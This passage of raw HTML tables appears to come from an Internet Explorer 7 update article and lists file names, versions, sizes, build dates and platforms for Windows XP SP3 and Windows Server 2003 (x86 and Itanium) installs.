class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">132,608</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">389,120</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">23:53</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Icardie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">63,488</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:12</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">153,088</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">230,400</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakui.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">161,792</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:06</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">04-Sep-2013</td><td class=\"sbody-td\">13:47</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21357</td><td class=\"sbody-td\">388,608</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">78,336</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">6,108,672</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll.mui</td><td class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">991,232</td><td class=\"sbody-td\">04-Sep-2013</td><td class=\"sbody-td\">13:47</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">268,288</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:12</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">643,224</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:08</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,830,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">496,128</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">52,224</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">3,626,496</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msrating.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">102,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:05</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,172,992</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Webcheck.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">233,472</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">841,216</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:35</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported 32-bit versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Advpack.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">124,928</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">347,136</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">214,528</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Extmgr.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">132,608</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">389,120</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">06:49</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Icardie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">63,488</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:26</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">153,088</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">230,400</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakui.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">161,792</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:21</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">15-Mar-2012</td><td class=\"sbody-td\">19:37</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21357</td><td class=\"sbody-td\">388,608</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">78,336</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">6,108,672</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll.mui</td><td class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">991,232</td><td class=\"sbody-td\">08-Jul-2010</td><td class=\"sbody-td\">23:35</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">268,288</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:26</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">643,224</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:23</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,830,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">496,128</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">52,224</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">3,626,496</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msrating.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">102,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,172,992</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Webcheck.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">233,472</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">841,216</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">17:38</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported Itanium-based versions of Windows Server 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Advpack.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">283,136</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">49,152</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">984,576</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">645,632</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Extmgr.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">328,192</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">965,632</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Icardie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">179,712</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">135,680</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">385,536</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">503,808</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:19</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakui.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td 